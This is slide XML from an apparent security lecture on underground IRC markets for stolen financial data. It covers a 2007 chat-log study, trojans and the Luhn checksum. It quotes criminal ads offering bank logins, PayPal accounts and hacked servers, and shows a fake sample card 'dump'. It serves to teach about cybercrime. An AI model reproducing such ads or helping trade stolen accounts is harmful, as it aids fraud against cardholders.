      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2402005"/>
            <a:ext cx="10515600" cy="4455995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Study examined 7 months of logs from an underground IRC chatroom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data collected in 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>13 million messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Populated by buyers, sellers, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rippers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Administrators verify trustworthy sellers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rippers steal from naïve buyers or sell fraudulent goods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most messages are advertisements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The actual deal making is done via private messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22706017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Advertisements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4932984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some participants ask for good or services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have boa wells and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>barclays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bank logins.... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>have hacked hosts, mail lists, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mailer send to all inbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> need 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mastercard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> give 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hacked root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have verified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>paypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> accounts with good balance...and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cashout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>paypals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Others offer samples to prove they have specific data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name: Phil Phished</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address: 100 Scammed Lane, Pittsburgh, PA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phone: 555-687-5309</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Card Number: 4123 4567 8901 2345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 10/09 CVV: 123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSN: 123-45-6789</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419850" y="4931788"/>
            <a:ext cx="4288675" cy="746871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>CHECKING 123-456-XXXX $51,337.31</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>SAVINGS 987-654-XXXX $75,299.64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260287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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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9" end="9"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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10" end="1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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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11" end="11"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38"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12" end="12"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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41923"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive Data in Ads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3476" y="1041924"/>
            <a:ext cx="8700148" cy="5668278"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31704460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55058"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are Credit Cards Valid?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500" y="1437857"/>
            <a:ext cx="8096250" cy="2324160"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4194064"/>
            <a:ext cx="10515600" cy="249497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rightmost digit of every credit card number is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Luhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Digit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Luhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> algorithm is a simple checksum algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables you to quickly check of a credit card number is possibly valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, just because a card number passes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Luhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> algorithm…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn’t mean it’s a valid card number, it hasn’t been cancelled, or the credit limit hasn’t been reached</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1609262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5B30B-8418-4F32-9C97-B42297A86CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trojans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7BA56F7-0E10-4EF8-9718-C8A73E0DD255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software that appears to do something useful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An e-card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A needed video codec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A browser toolbar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But harms the system in some way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious activity is often masked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User only sees the “advertised” functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A72F4EC-1F17-4EBF-9E09-4E0FE69AA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1471" y="66409"/>
            <a:ext cx="3518432" cy="3518432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39414841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Credit Cards Come From?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013" y="1321813"/>
            <a:ext cx="11827974" cy="5275160"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26622095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50" y="1676658"/>
            <a:ext cx="11887200" cy="5079209"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="2009775"/>
            <a:ext cx="769235" cy="46672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09851" y="2009775"/>
            <a:ext cx="704850" cy="46672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71927" y="2009775"/>
            <a:ext cx="952498" cy="46672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91202" y="2009775"/>
            <a:ext cx="495298" cy="42767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04357" y="2009774"/>
            <a:ext cx="485773" cy="42767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248652" y="2009773"/>
            <a:ext cx="285750" cy="466725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924924" y="2009773"/>
            <a:ext cx="285750" cy="466725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27348" y="2009773"/>
            <a:ext cx="493077" cy="466725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ular Callout 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600949" y="752098"/>
            <a:ext cx="2823341" cy="924560"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21471"/>
              <a:gd name="adj2" fmla="val 767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Accounts and personal information, a.k.a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>dumps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600949" y="2009773"/>
            <a:ext cx="285750" cy="466725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671073" y="2009773"/>
            <a:ext cx="320922" cy="466725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47709" y="2009773"/>
            <a:ext cx="320922" cy="466725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48516" y="2009773"/>
            <a:ext cx="527582" cy="466725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87328" y="2009773"/>
            <a:ext cx="320922" cy="466725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ular Callout 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7147243" y="730368"/>
            <a:ext cx="2823341" cy="924560"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39523"/>
              <a:gd name="adj2" fmla="val 7840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Email lists, mail proxies, and scam sites for spamming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9387979" y="2009771"/>
            <a:ext cx="493077" cy="466725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ular Callout 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8907210" y="927532"/>
            <a:ext cx="1454613" cy="713046"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1394"/>
              <a:gd name="adj2" fmla="val 8681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Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985463" y="2009771"/>
            <a:ext cx="364291" cy="466725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191822" y="2009771"/>
            <a:ext cx="322014" cy="426425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ular Callout 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692630" y="923973"/>
            <a:ext cx="1454613" cy="713046"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1394"/>
              <a:gd name="adj2" fmla="val 8681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Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4840927" y="2002276"/>
            <a:ext cx="333963" cy="466725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34958" y="2002276"/>
            <a:ext cx="490245" cy="466725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672957" y="2006264"/>
            <a:ext cx="274282" cy="428023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ular Callout 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1433512" y="937686"/>
            <a:ext cx="1740853" cy="707228"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1394"/>
              <a:gd name="adj2" fmla="val 868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Hacked Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7773101" y="2002276"/>
            <a:ext cx="320922" cy="466725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1159398" y="1992248"/>
            <a:ext cx="757781" cy="466725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9123897" y="1988041"/>
            <a:ext cx="320922" cy="466725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079054" y="2009773"/>
            <a:ext cx="740568" cy="431636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ular Callout 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8687910" y="566895"/>
            <a:ext cx="3130645" cy="910609"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36433"/>
              <a:gd name="adj2" fmla="val 9669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Mechanisms for charging credit cards and transferring cash </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336839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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(dow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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="22" presetClass="entr" presetSubtype="4"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down)">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="after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down)">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xit" presetSubtype="4" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
